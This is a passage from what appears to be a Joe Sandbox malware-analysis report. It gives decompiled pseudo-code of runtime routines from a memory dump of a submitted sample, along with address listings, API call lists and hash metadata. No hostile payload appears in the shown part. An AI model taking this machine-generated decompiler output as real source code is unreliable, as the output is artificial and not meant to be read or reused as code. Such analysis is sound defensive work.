                                                									_t155 =  *((intOrPtr*)(0x203178 + _v12 * 4));
                                                									L22:
                                                									_v24 = _t155;
                                                									L23:
                                                									_t204 = _v24;
                                                									_t230 = 0;
                                                									_t156 = _v20;
                                                									_v36 = _t220;
                                                									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
                                                									_t205 = _a4;
                                                									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
                                                										_t174 =  *((intOrPtr*)(_t156 + _v24 + 0x2a));
                                                										_t223 = _v16;
                                                										__eflags = _t174 - 0xa;
                                                										if(_t174 != 0xa) {
                                                											__eflags = _t197;
                                                											if(_t197 != 0) {
                                                												_t230 = 1;
                                                												 *_t223 = _t174;
                                                												_t224 = _t223 + 1;
                                                												_t197 = _t197 - 1;
                                                												__eflags = _v5;
                                                												_v16 = _t224;
                                                												 *((char*)(_v20 +  *((intOrPtr*)(0x203178 + _v12 * 4)) + 0x2a)) = 0xa;
                                                												_t205 = _a4;
                                                												if(_v5 != 0) {
                                                													_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x203178 + _v12 * 4)) + 0x2b));
                                                													_t205 = _a4;
                                                													__eflags = _t179 - 0xa;
                                                													if(_t179 != 0xa) {
                                                														__eflags = _t197;
                                                														if(_t197 != 0) {
                                                															 *_t224 = _t179;
                                                															_t225 = _t224 + 1;
                                                															_t197 = _t197 - 1;
                                                															__eflags = _v5 - 1;
                                                															_v16 = _t225;
                                                															_t230 = 2;
                                                															 *((char*)(_v20 +  *((intOrPtr*)(0x203178 + _v12 * 4)) + 0x2b)) = 0xa;
                                                															_t205 = _a4;
                                                															if(_v5 == 1) {
                                                																_t184 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x203178 + _v12 * 4)) + 0x2c));
                                                																_t205 = _a4;
                                                																__eflags = _t184 - 0xa;
                                                																if(_t184 != 0xa) {
                                                																	__eflags = _t197;
                                                																	if(_t197 != 0) {
                                                																		 *_t225 = _t184;
                                                																		_t197 = _t197 - 1;
                                                																		__eflags = _t197;
                                                																		_v16 = _t225 + 1;
                                                																		_t230 = 3;
                                                																		 *((char*)(_v20 +  *((intOrPtr*)(0x203178 + _v12 * 4)) + 0x2c)) = 0xa;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                									_t157 = E001C39CA(_t205);
                                                									__eflags = _t157;
                                                									if(_t157 == 0) {
                                                										L43:
                                                										_v32 = 0;
                                                										L44:
                                                										_t198 = _v16;
                                                										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0);
                                                										__eflags = _t159;
                                                										if(_t159 == 0) {
                                                											L55:
                                                											_t160 = GetLastError();
                                                											_t230 = 5;
                                                											__eflags = _t160 - _t230;
                                                											if(_t160 != _t230) {
                                                												__eflags = _t160 - 0x6d;
                                                												if(_t160 != 0x6d) {
                                                													L39:
                                                													E001AFEE7(_t160);
                                                													goto L40;
                                                												}
                                                												_t231 = 0;
                                                												goto L41;
                                                											}
                                                											 *((intOrPtr*)(E001AFF41())) = 9;
                                                											 *(E001AFF2E()) = _t230;
                                                											goto L40;
                                                										}
                                                										_t208 = _a12;
                                                										__eflags = _v24 - _t208;
                                                										if(_v24 > _t208) {
                                                											goto L55;
                                                										}
                                                										_t231 = _t230 + _v24;
                                                										__eflags = _t231;
                                                										L47:
                                                										_t221 = _v20;
                                                										_t165 =  *((intOrPtr*)(0x203178 + _v12 * 4));
                                                										__eflags =  *((char*)(_t221 + _t165 + 0x28));
                                                										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
                                                											__eflags = _v5 - 2;
                                                											if(_v5 == 2) {
                                                												__eflags = _v32;
                                                												_push(_t231 >> 1);
                                                												_push(_v36);
                                                												_push(_a4);
                                                												if(_v32 == 0) {
                                                													_t166 = E001BB5DE();
                                                												} else {
                                                													_t166 = E001BB8DD();
                                                												}
                                                											} else {
                                                												_t209 = _t208 >> 1;
                                                												__eflags = _t208 >> 1;
                                                												_t166 = E001BB786(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
                                                											}
                                                											_t231 = _t166;
                                                										}
                                                										goto L41;
                                                									}
                                                									_t210 = _v20;
                                                									_t168 =  *((intOrPtr*)(0x203178 + _v12 * 4));
                                                									__eflags =  *((char*)(_t210 + _t168 + 0x28));
                                                									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
                                                										goto L43;
                                                									}
                                                									_t104 =  &_v28; // 0xa
                                                									_t170 = GetConsoleMode( *_t104,  &_v40);
                                                									__eflags = _t170;
                                                									if(_t170 == 0) {
                                                										goto L43;
                                                									}
                                                									__eflags = _v5 - 2;
                                                									if(_v5 != 2) {
                                                										goto L44;
                                                									}
                                                									_t198 = _v16;
                                                									_t172 = ReadConsoleW(_v28, _v16, _t197 >> 1,  &_v24, 0);
                                                									__eflags = _t172;
                                                									if(_t172 != 0) {
                                                										_t208 = _a12;
                                                										_t231 = _t230 + _v24 * 2;
                                                										goto L47;
                                                									}
                                                									_t160 = GetLastError();
                                                									goto L39;
                                                								} else {
                                                									 *((intOrPtr*)(E001AFF41())) = 0xc;
                                                									 *(E001AFF2E()) = 8;
                                                									L40:
                                                									_t231 = _t230 | 0xffffffff;
                                                									__eflags = _t231;
                                                									L41:
                                                									E001B63EF(_t235);
                                                									_t135 = _t231;
                                                									goto L63;
                                                								}
                                                							}
                                                						}
                                                						__eflags = _t143 == 1;
                                                						if(_t143 == 1) {
                                                							_t191 =  !_t218;
                                                							__eflags = 1 & _t191;
                                                							if((1 & _t191) != 0) {
                                                								_t155 = _v24;
                                                								_t197 = _t218;
                                                								_t220 = _a8;
                                                								_v16 = _t220;
                                                								goto L22;
                                                							}
                                                							goto L14;
                                                						} else {
                                                							_t197 = _t218;
                                                							_t220 = _a8;
                                                							_v16 = _t220;
                                                							goto L23;
                                                						}
                                                					}
                                                					L6:
                                                					 *(E001AFF2E()) =  *_t139 & 0x00000000;
                                                					 *((intOrPtr*)(E001AFF41())) = 0x16;
                                                					goto L61;
                                                				} else {
                                                					 *(E001AFF2E()) =  *_t192 & 0x00000000;
                                                					_t134 = E001AFF41();
                                                					 *_t134 = 9;
                                                					L62:
                                                					_t135 = _t134 | 0xffffffff;
                                                					L63:
                                                					return _t135;
                                                				}
                                                			}
























































                                                0x001bba71
                                                0x001bba74
                                                0x001bba7c
                                                0x001bba96
                                                0x001bba98
                                                0x001bbdec
                                                0x001bbdec
                                                0x001bbdf1
                                                0x001bbdf1
                                                0x001bbdf9
                                                0x001bbdff
                                                0x001bbdff
                                                0x00000000
                                                0x001bbdff
                                                0x001bba9e
                                                0x001bbaa4
                                                0x00000000
                                                0x00000000
                                                0x001bbaae
                                                0x001bbab4
                                                0x001bbab9
                                                0x001bbabd
                                                0x001bbac0
                                                0x001bbac7
                                                0x001bbaca
                                                0x001bbacd
                                                0x001bbad1
                                                0x001bbad4
                                                0x001bbad6
                                                0x00000000
                                                0x00000000
                                                0x001bbadc
                                                0x001bbadf
                                                0x001bbae5
                                                0x001bbaff
                                                0x001bbb01
                                                0x001bbde8
                                                0x001bbde8
                                                0x00000000
                                                0x001bbde8
                                                0x001bbb07
                                                0x001bbb0b
                                                0x00000000
                                                0x00000000
                                                0x001bbb11
                                                0x001bbb15
                                                0x00000000
                                                0x00000000
                                                0x001bbb1c
                                                0x001bbb20
                                                0x001bbb23
                                                0x001bbb26
                                                0x001bbb2b
                                                0x001bbb2b
                                                0x001bbb2e
                                                0x001bbb75
                                                0x001bbb77
                                                0x001bbb79
                                                0x001bbb4a
                                                0x001bbb4f
                                                0x001bbb56
                                                0x001bbb5c
                                                0x00000000
                                                0x001bbb7b
                                                0x001bbb7d
                                                0x001bbb7f
                                                0x001bbb80
                                                0x001bbb82
                                                0x001bbb84
                                                0x001bbb84
                                                0x001bbb8e
                                                0x001bbb90
                                                0x001bbb97
                                                0x001bbb9c
                                                0x001bbb9f
                                                0x001bbba2
                                                0x001bbba4
                                                0x001bbbca
                                                0x001bbbd2
                                                0x001bbbd5
                                                0x001bbbdc
                                                0x001bbbe3
                                                0x001bbbe7
                                                0x001bbbe9
                                                0x001bbbf0
                                                0x001bbbf0
                                                0x001bbbf3
                                                0x001bbbf3
                                                0x001bbbf6
                                                0x001bbbf8
                                                0x001bbbfb
                                                0x001bbbfe
                                                0x001bbc03
                                                0x001bbc06
                                                0x001bbc0f
                                                0x001bbc13
                                                0x001bbc16
                                                0x001bbc18
                                                0x001bbc1e
                                                0x001bbc20
                                                0x001bbc29
                                                0x001bbc2a
                                                0x001bbc2c
                                                0x001bbc30
                                                0x001bbc31
                                                0x001bbc35
                                                0x001bbc3f
                                                0x001bbc44
                                                0x001bbc47
                                                0x001bbc56
                                                0x001bbc5a
                                                0x001bbc5d
                                                0x001bbc5f
                                                0x001bbc61
                                                0x001bbc63
                                                0x001bbc68
                                                0x001bbc6a
                                                0x001bbc6e
                                                0x001bbc6f
                                                0x001bbc75
                                                0x001bbc7f
                                                0x001bbc80
                                                0x001bbc85
                                                0x001bbc88
                                                0x001bbc97
                                                0x001bbc9b
                                                0x001bbc9e
                                                0x001bbca0
                                                0x001bbca2
                                                0x001bbca4
                                                0x001bbca6
                                                0x001bbcac
                                                0x001bbcac
                                                0x001bbcad
                                                0x001bbcbc
                                                0x001bbcbd
                                                0x001bbcbd
                                                0x001bbca4
                                                0x001bbca0
                                                0x001bbc88
                                                0x001bbc63
                                                0x001bbc5f
                                                0x001bbc47
                                                0x001bbc20
                                                0x001bbc18
                                                0x001bbcc3
                                                0x001bbcc9
                                                0x001bbccb
                                                0x001bbd3c
                                                0x001bbd3c
                                                0x001bbd40
                                                0x001bbd47
                                                0x001bbd4e
                                                0x001bbd54
                                                0x001bbd56
                                                0x001bbdb4
                                                0x001bbdb4
                                                0x001bbdbc
                                                0x001bbdbd
                                                0x001bbdbf
                                                0x001bbdd8
                                                0x001bbddb
                                                0x001bbd18
                                                0x001bbd19
                                                0x00000000
                                                0x001bbd1e
                                                0x001bbde1
                                                0x00000000
                                                0x001bbde1
                                                0x001bbdc6
                                                0x001bbdd1
                                                0x00000000
                                                0x001bbdd1
                                                0x001bbd58
                                                0x001bbd5b
                                                0x001bbd5e
                                                0x00000000
                                                0x00000000
                                                0x001bbd60
                                                0x001bbd60
                                                0x001bbd63
                                                0x001bbd66
                                                0x001bbd69
                                                0x001bbd70
                                                0x001bbd75
                                                0x001bbd77
                                                0x001bbd7b
                                                0x001bbd96
                                                0x001bbd9a
                                                0x001bbd9b
                                                0x001bbd9e
                                                0x001bbda1
                                                0x001bbdad
                                                0x001bbda3
                                                0x001bbda3
                                                0x001bbda3
                                                0x001bbd7d
                                                0x001bbd7d
                                                0x001bbd7d
                                                0x001bbd88
                                                0x001bbd8d
                                                0x001bbd90
                                                0x001bbd90
                                                0x00000000
                                                0x001bbd75
                                                0x001bbcd0
                                                0x001bbcd3
                                                0x001bbcda
                                                0x001bbcdf
                                                0x00000000
                                                0x00000000
                                                0x001bbce5
                                                0x001bbce8
                                                0x001bbcee
                                                0x001bbcf0
                                                0x00000000
                                                0x00000000
                                                0x001bbcf2
                                                0x001bbcf6
                                                0x00000000
                                                0x00000000
                                                0x001bbd01
                                                0x001bbd08
                                                0x001bbd0e
                                                0x001bbd10
                                                0x001bbd34
                                                0x001bbd37
                                                0x00000000
                                                0x001bbd37
                                                0x001bbd12
                                                0x00000000
                                                0x001bbba6
                                                0x001bbbab
                                                0x001bbbb6
                                                0x001bbd1f
                                                0x001bbd1f
                                                0x001bbd1f
                                                0x001bbd22
                                                0x001bbd23
                                                0x001bbd29
                                                0x00000000
                                                0x001bbd2b
                                                0x001bbba4
                                                0x001bbb79
                                                0x001bbb30
                                                0x001bbb33
                                                0x001bbb44
                                                0x001bbb46
                                                0x001bbb48
                                                0x001bbb66
                                                0x001bbb69
                                                0x001bbb6b
                                                0x001bbb6e
                                                0x00000000
                                                0x001bbb6e
                                                0x00000000
                                                0x001bbb35
                                                0x001bbb35
                                                0x001bbb37
                                                0x001bbb3a
                                                0x00000000
                                                0x001bbb3a
                                                0x001bbb33
                                                0x001bbae7
                                                0x001bbaec
                                                0x001bbaf4
                                                0x00000000
                                                0x001bba7e
                                                0x001bba83
                                                0x001bba86
                                                0x001bba8b
                                                0x001bbe04
                                                0x001bbe04
                                                0x001bbe07
                                                0x001bbe0a
                                                0x001bbe0a

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3907804496
                                                • Opcode ID: bdc1295efbe501e8c49e798a1a48afaf811ece5b19f040ae86a76d6cc6237d42
                                                • Instruction ID: 9c56b63dcd47de5196883d4f0153b5e0284f95d19d27353ab3fce5aa9102cc2b
                                                • Opcode Fuzzy Hash: bdc1295efbe501e8c49e798a1a48afaf811ece5b19f040ae86a76d6cc6237d42
                                                • Instruction Fuzzy Hash: 6AB1F174A08249AFDB15DF99C8C1BEDBBB5BF5A304F184158E4049B692C7B49E42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E001C58DA(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				signed int _v32;
                                                				intOrPtr* _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				void* _v56;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t49;
                                                				int _t54;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				void* _t63;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				int _t71;
                                                				char* _t76;
                                                				char* _t77;
                                                				int _t81;
                                                				int _t82;
                                                				intOrPtr _t94;
                                                				intOrPtr _t95;
                                                				signed int _t103;
                                                				void* _t104;
                                                				int _t106;
                                                				void* _t107;
                                                				intOrPtr* _t108;
                                                
                                                				_t49 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t49 ^ _t103;
                                                				_t83 = _a24;
                                                				_v40 = _a4;
                                                				_t102 = _a20;
                                                				_v44 = _a8;
                                                				_t53 = _a16;
                                                				_v32 = _a16;
                                                				_v36 = _a24;
                                                				if(_t102 <= 0) {
                                                					if(_t102 < 0xffffffff) {
                                                						goto L54;
                                                					} else {
                                                						goto L3;
                                                					}
                                                				} else {
                                                					_t81 = E001B30CF(_t53, _t102);
                                                					_t83 = _v36;
                                                					_t102 = _t81;
                                                					L3:
                                                					_t101 = _a28;
                                                					if(_t101 <= 0) {
                                                						if(_t101 < 0xffffffff) {
                                                							goto L54;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t101 = E001B30CF(_t83, _t101);
                                                						_a28 = _t101;
                                                						L6:
                                                						_t82 = _a32;
                                                						if(_t82 == 0) {
                                                							_t82 =  *( *_v40 + 8);
                                                							_a32 = _t82;
                                                						}
                                                						if(_t102 == 0 || _t101 == 0) {
                                                							if(_t102 == _t101) {
                                                								L61:
                                                								_push(2);
                                                								goto L23;
                                                							} else {
                                                								if(_t101 > 1) {
                                                									L32:
                                                									_t54 = 1;
                                                								} else {
                                                									if(_t102 > 1) {
                                                										L22:
                                                										_push(3);
                                                										goto L23;
                                                									} else {
                                                										if(GetCPInfo(_t82,  &_v28) == 0) {
                                                											goto L54;
                                                										} else {
                                                											if(_t102 <= 0) {
                                                												if(_t101 <= 0) {
                                                													goto L33;
                                                												} else {
                                                													if(_v28 >= 2) {
                                                														_t76 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t101 = _v36;
                                                															while(1) {
                                                																_t94 =  *((intOrPtr*)(_t76 + 1));
                                                																if(_t94 == 0) {
                                                																	goto L32;
                                                																}
                                                																_t100 =  *_t101;
                                                																if(_t100 <  *_t76 || _t100 > _t94) {
                                                																	_t76 = _t76 + 2;
                                                																	if( *_t76 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L32;
                                                																	}
                                                																} else {
                                                																	goto L61;
                                                																}
                                                																goto L55;
                                                															}
                                                														}
                                                													}
                                                													goto L32;
                                                												}
                                                											} else {
                                                												if(_v28 >= 2) {
                                                													_t77 =  &_v22;
                                                													if(_v22 != 0) {
                                                														_t102 = _v32;
                                                														while(1) {
                                                															_t95 =  *((intOrPtr*)(_t77 + 1));
                                                															if(_t95 == 0) {
                                                																goto L22;
                                                															}
                                                															_t100 =  *_t102;
                                                															if(_t100 <  *_t77 || _t100 > _t95) {
                                                																_t77 = _t77 + 2;
                                                																if( *_t77 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L22;
                                                																}
                                                															} else {
                                                																goto L61;
                                                															}
                                                															goto L23;
                                                														}
                                                													}
                                                												}
                                                												goto L22;
                                                												L23:
                                                												_pop(_t54);
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							L33:
                                                							_t59 = E001BDCC5(_t82, 9, _v32, _t102, 0, 0);
                                                							_t106 = _t104 + 0x18;
                                                							_v40 = _t59;
                                                							if(_t59 == 0) {
                                                								L54:
                                                								_t54 = 0;
                                                							} else {
                                                								_t100 = _t59 + _t59 + 8;
                                                								asm("sbb eax, eax");
                                                								_t60 = _t59 & _t59 + _t59 + 0x00000008;
                                                								if(_t60 == 0) {
                                                									L60:
                                                									_push(0);
                                                									goto L59;
                                                								} else {
                                                									if(_t60 > 0x400) {
                                                										_t82 = E001B6429(_t60);
                                                										if(_t82 == 0) {
                                                											goto L60;
                                                										} else {
                                                											 *_t82 = 0xdddd;
                                                											goto L40;
                                                										}
                                                									} else {
                                                										E001A9B20(_t60);
                                                										_t82 = _t106;
                                                										if(_t82 == 0) {
                                                											goto L60;
                                                										} else {
                                                											 *_t82 = 0xcccc;
                                                											L40:
                                                											_t82 = _t82 + 8;
                                                											if(_t82 == 0) {
                                                												goto L60;
                                                											} else {
                                                												_t102 = _a32;
                                                												_t63 = E001BDCC5(_a32, 1, _v32, _a32, _t82, _v40);
                                                												_t107 = _t106 + 0x18;
                                                												if(_t63 == 0) {
                                                													L58:
                                                													_push(_t82);
                                                													L59:
                                                													E001A9527();
                                                													goto L53;
                                                												} else {
                                                													_t101 = _v36;
                                                													_t64 = E001BDCC5(_t102, 9, _v36, _v36, 0, 0);
                                                													_t108 = _t107 + 0x18;
                                                													_v32 = _t64;
                                                													if(_t64 == 0) {
                                                														goto L58;
                                                													} else {
                                                														_t100 = _t64 + _t64 + 8;
                                                														asm("sbb eax, eax");
                                                														_t65 = _t64 & _t64 + _t64 + 0x00000008;
                                                														if(_t65 == 0) {
                                                															L57:
                                                															_push(0);
                                                															goto L52;
                                                														} else {
                                                															if(_t65 > 0x400) {
                                                																_t101 = E001B6429(_t65);
                                                																if(_t101 == 0) {
                                                																	goto L57;
                                                																} else {
                                                																	 *_t101 = 0xdddd;
                                                																	goto L49;
                                                																}
                                                															} else {
                                                																E001A9B20(_t65);
                                                																_t101 = _t108;
                                                																if(_t101 == 0) {
                                                																	goto L57;
                                                																} else {
                                                																	 *_t101 = 0xcccc;
                                                																	L49:
                                                																	_t101 = _t101 + 8;
                                                																	if(_t101 == 0) {
                                                																		goto L57;
                                                																	} else {
                                                																		if(E001BDCC5(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
                                                																			_t71 = E001B8A7E(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
                                                																			_t102 = _t71;
                                                																			E001A9527(_t101);
                                                																			E001A9527(_t82);
                                                																			_t54 = _t71;
                                                																		} else {
                                                																			_push(_t101);
                                                																			L52:
                                                																			E001A9527();
                                                																			E001A9527(_t82);
                                                																			L53:
                                                																			goto L54;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L55:
                                                				return E001A9545(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
                                                			}

































                                                0x001c58e2
                                                0x001c58e9
                                                0x001c58ef
                                                0x001c58f3
                                                0x001c58fa
                                                0x001c58fd
                                                0x001c5900
                                                0x001c5903
                                                0x001c5906
                                                0x001c590c
                                                0x001c5921
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c590e
                                                0x001c5910
                                                0x001c5917
                                                0x001c591a
                                                0x001c5927
                                                0x001c5927
                                                0x001c592c
                                                0x001c5941
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c592e
                                                0x001c5936
                                                0x001c5939
                                                0x001c5947
                                                0x001c5947
                                                0x001c594c
                                                0x001c5953
                                                0x001c5956
                                                0x001c5956
                                                0x001c595b
                                                0x001c5967
                                                0x001c5b72
                                                0x001c5b72
                                                0x00000000
                                                0x001c596d
                                                0x001c5970
                                                0x001c59fc
                                                0x001c59fe
                                                0x001c5976
                                                0x001c5979
                                                0x001c59c1
                                                0x001c59c1
                                                0x00000000
                                                0x001c597b
                                                0x001c5988
                                                0x00000000
                                                0x001c598e
                                                0x001c5990
                                                0x001c59cb
                                                0x00000000
                                                0x001c59cd
                                                0x001c59d1
                                                0x001c59d7
                                                0x001c59da
                                                0x001c59dc
                                                0x001c59df
                                                0x001c59df
                                                0x001c59e4
                                                0x00000000
                                                0x00000000
                                                0x001c59e6
                                                0x001c59ea
                                                0x001c59f4
                                                0x001c59fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c59ea
                                                0x001c59df
                                                0x001c59da
                                                0x00000000
                                                0x001c59d1
                                                0x001c5992
                                                0x001c5996
                                                0x001c599c
                                                0x001c599f
                                                0x001c59a1
                                                0x001c59a4
                                                0x001c59a4
                                                0x001c59a9
                                                0x00000000
                                                0x00000000
                                                0x001c59ab
                                                0x001c59af
                                                0x001c59b9
                                                0x001c59bf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c59af
                                                0x001c59a4
                                                0x001c599f
                                                0x00000000
                                                0x001c59c3
                                                0x001c59c3
                                                0x001c59c3
                                                0x001c5990
                                                0x001c5988
                                                0x001c5979
                                                0x001c5970
                                                0x001c5a04
                                                0x001c5a04
                                                0x001c5a0f
                                                0x001c5a14
                                                0x001c5a17
                                                0x001c5a1c
                                                0x001c5b22
                                                0x001c5b22
                                                0x001c5a22
                                                0x001c5a25
                                                0x001c5a2a
                                                0x001c5a2c
                                                0x001c5a2e
                                                0x001c5b6e
                                                0x001c5b6e
                                                0x00000000
                                                0x001c5a34
                                                0x001c5a39
                                                0x001c5a58
                                                0x001c5a5d
                                                0x00000000
                                                0x001c5a63
                                                0x001c5a63
                                                0x00000000
                                                0x001c5a63
                                                0x001c5a3b
                                                0x001c5a3b
                                                0x001c5a40
                                                0x001c5a44
                                                0x00000000
                                                0x001c5a4a
                                                0x001c5a4a
                                                0x001c5a69
                                                0x001c5a69
                                                0x001c5a6e
                                                0x00000000
                                                0x001c5a74
                                                0x001c5a7c
                                                0x001c5a82
                                                0x001c5a87
                                                0x001c5a8c
                                                0x001c5b66
                                                0x001c5b66
                                                0x001c5b67
                                                0x001c5b67
                                                0x00000000
                                                0x001c5a92
                                                0x001c5a97
                                                0x001c5a9e
                                                0x001c5aa3
                                                0x001c5aa6
                                                0x001c5aab
                                                0x00000000
                                                0x001c5ab1
                                                0x001c5ab4
                                                0x001c5ab9
                                                0x001c5abb
                                                0x001c5abd
                                                0x001c5b62
                                                0x001c5b62
                                                0x00000000
                                                0x001c5ac3
                                                0x001c5ac8
                                                0x001c5ae7
                                                0x001c5aec
                                                0x00000000
                                                0x001c5aee
                                                0x001c5aee
                                                0x00000000
                                                0x001c5aee
                                                0x001c5aca
                                                0x001c5aca
                                                0x001c5acf
                                                0x001c5ad3
                                                0x00000000
                                                0x001c5ad9
                                                0x001c5ad9
                                                0x001c5af4
                                                0x001c5af4
                                                0x001c5af9
                                                0x00000000
                                                0x001c5afb
                                                0x001c5b12
                                                0x001c5b49
                                                0x001c5b4f
                                                0x001c5b51
                                                0x001c5b57
                                                0x001c5b5e
                                                0x001c5b14
                                                0x001c5b14
                                                0x001c5b15
                                                0x001c5b15
                                                0x001c5b1b
                                                0x001c5b21
                                                0x00000000
                                                0x001c5b21
                                                0x001c5b12
                                                0x001c5af9
                                                0x001c5ad3
                                                0x001c5ac8
                                                0x001c5abd
                                                0x001c5aab
                                                0x001c5a8c
                                                0x001c5a6e
                                                0x001c5a44
                                                0x001c5a39
                                                0x001c5a2e
                                                0x001c5a1c
                                                0x001c595b
                                                0x001c592c
                                                0x001c5b24
                                                0x001c5b35

                                                APIs
                                                • GetCPInfo.KERNEL32(00B0E948,00B0E948,?,7FFFFFFF,?,001C5BAA,00B0E948,00B0E948,?,00B0E948,?,?,?,?,00B0E948,?), ref: 001C5980
                                                • __alloca_probe_16.LIBCMT ref: 001C5A3B
                                                • __alloca_probe_16.LIBCMT ref: 001C5ACA
                                                • __freea.LIBCMT ref: 001C5B15
                                                • __freea.LIBCMT ref: 001C5B1B
                                                • __freea.LIBCMT ref: 001C5B51
                                                • __freea.LIBCMT ref: 001C5B57
                                                • __freea.LIBCMT ref: 001C5B67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$Info
                                                • String ID:
                                                • API String ID: 127012223-0
                                                • Opcode ID: 3f232482a300dd4c2230538096cb222ba0a2ade1195666c6d2af273c24473c09
                                                • Instruction ID: ae8262e042b53d3c582f0bbcdb2c1a840619affbe658c6a169e46e69868de79e
                                                • Opcode Fuzzy Hash: 3f232482a300dd4c2230538096cb222ba0a2ade1195666c6d2af273c24473c09
                                                • Instruction Fuzzy Hash: AE71F672900A059BDF259E948C42FEEBBABDF65364F29019DF904A7281DB35FC808764
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 001A93A4
                                                • __alloca_probe_16.LIBCMT ref: 001A93D0
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 001A940F
                                                • LCMapStringEx.KERNEL32 ref: 001A942C
                                                • LCMapStringEx.KERNEL32 ref: 001A946B
                                                • __alloca_probe_16.LIBCMT ref: 001A9488
                                                • LCMapStringEx.KERNEL32 ref: 001A94CA
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001A94ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                • String ID:
                                                • API String ID: 2040435927-0
                                                • Opcode ID: 32b6ecbfdf8bd21f02e340ec119acd6629aaad9d75e538e5b7a637bc9c24585c
                                                • Instruction ID: 89ae904782ceac5b2bee22535d7e4ae91aac8b87e7f94de95ebeb088e3fbd7b4
                                                • Opcode Fuzzy Hash: 32b6ecbfdf8bd21f02e340ec119acd6629aaad9d75e538e5b7a637bc9c24585c
                                                • Instruction Fuzzy Hash: FA51E07A90020AAFEF219FA5CC85FAB3BB9EF4A750F114425F905E6194D730CD91CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E001AC97A(void* __ecx, void* __edx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t14;
                                                				void* _t18;
                                                				void* _t24;
                                                				long _t25;
                                                				void* _t28;
                                                
                                                				_t13 = __ecx;
                                                				if( *0x1d5040 != 0xffffffff) {
                                                					_t25 = GetLastError();
